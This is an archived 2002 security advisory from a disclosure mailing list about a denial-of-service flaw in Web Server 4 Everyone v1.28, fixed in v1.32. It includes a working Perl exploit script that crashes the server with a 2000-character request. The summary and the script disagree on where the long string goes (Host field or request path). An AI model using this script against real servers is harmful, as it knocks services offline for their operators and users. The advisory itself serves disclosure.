| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <14861043586.20021023121422@securityoffice.net>
From: ts at securityoffice.net (Tamer Sahin)
Subject: [SecurityOffice] Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: MD5
- --[ Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability ]--
- --[ Type
Denial of Service
- --[ Release Date
October 23, 2002
- --[ Product / Vendor
Web Server 4 Everyone is an Internet and Intranet server that supports HTTP Services.
Web Server 4 Everyone is available for Microsoft Windows operating systems.
http://www.freeware.lt/Info/projects.php
- --[ Summary
The problem is Web Server 4 Everyone v1.28 with bounds checking, when you request 2000
characters "web4all.exe" just shuts down. This vulnerability also affects Web Server 4
Everyone versions prior to v1.28 for Microsoft Windows 2000.
When the attacker send a request in size of 2000 characters in "Host:" field that contains
all "127.0.0.1", the server crashes. In case you send a request that size without adding
the "Host:" there is no effect on running program. The Web server must be restarted to
regain normal functionality.
- --[ Exploit
An exploit for this vulnerability exists and is available below.
=============== SNIP ===============
#!/usr/bin/perl -w
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;
print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "Connection failed.\n";
print "Attacking...\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";
close($socket);
print "\nConnection closed. Finished.\n\n";
=============== SNIP ===============
- --[ Tested
Windows 2000 Sp3 / Web Server 4 Everyone v1.28
Windows 98 SE / Web Server 4 Everyone v1.28
- --[ Vulnerable
Web Server 4 Everyone v1.28
- --[ Vendor Status
This vulnerability fixed Web Server 4 Everyone v1.32
- --[ Disclaimer
http://www.securityoffice.net is not responsible for the misuse or illegal use of
any of the information and/or the software listed on this security advisory.
- --[ Author
Tamer Sahin
ts@...urityoffice.net
http://www.securityoffice.net
All our advisories can be viewed at http://www.securityoffice.net/articles/
Please send suggestions, updates, and comments to feedback@...urityoffice.net
(c) 2002 SecurityOffice
This Security Advisory may be reproduced and distributed, provided that this Security
Advisory is not modified in any way and is attributed to SecurityOffice and provided
that such reproduction and distribution is performed for non-commercial purposes.
Tamer Sahin
http://www.securityoffice.net
-----BEGIN PGP SIGNATURE-----
Version: 2.6
iQEVAwUAPbZocPpL5ibJRTtBAQFygAgAh+O2QmmJ6knUs+kgf2/yfdzG/EFSx7ti
+cByVWgyj/QEgM2fazeDyCEnjBLkcET8jkCivq7aDLG77iTsrKdCaJf9eo+L0uhW
EL3E0c5U+oV4V4gipvk0hDrwI7heKfF9ASDEiqv9XxfObf9PNUOqYagsCx7lkTgu
ea7gizKa3VGdhRaguVjdz8DPBBQwSDYiQKAFlTgHi52FEwtdoj9VrFP4sUNmjkd+
2HP6mOdxEs2GqObIVziwI32FMeTTwDuMXdb4e9Ht3ZxkvPEcsI+GEU1K5erRTzng
5g62L5VRbKgCLXto0kFykQZkjSo9v13bexmvMcdTBlvG7um4mbc38g==
=G28B
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists